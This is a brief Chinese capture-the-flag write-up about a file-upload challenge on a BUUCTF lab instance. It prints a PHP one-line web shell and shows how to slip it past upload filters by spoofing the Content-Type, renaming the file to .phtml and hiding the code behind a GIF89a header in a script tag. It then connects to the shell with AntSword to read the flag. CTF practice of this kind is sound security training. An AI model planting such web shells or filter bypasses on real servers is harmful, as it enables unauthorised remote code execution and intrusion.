网址:
题目
?解题:
打开题目实例
?我们这里发现要上传一张图片,我们先尝试上传一句话木马
1.php
<?php @eval($_POST['shell']);?>
?我们使用burp抓取数据包并修改测试:
我们先将?Content-Type修改为 image/jpeg提交,返回信息提示 NOT php!
我们修改后缀 1.phtml,再次提交
我们发现提示?NO! HACKER! your file included '<?'?
大概意识就是我们的文本中存在非法符号!
我们修改文本内容
GIF89a
<script language="php">eval($_POST['shell']);</script> 
?我们发现可以上传成功!
Forward发送请求,
?页面显示上传成功
?
这样的话我们尝试使用蚁剑连接
忙猜一波文件位置在:
/upload/1.phtml蚁剑尝试连接,连接成功!!
http://ca0024d6-eee3-4117-a1c6-ee498d5eef89.node4.buuoj.cn:81/upload/1.phtml
?查找flag,成功找到flag!
?
?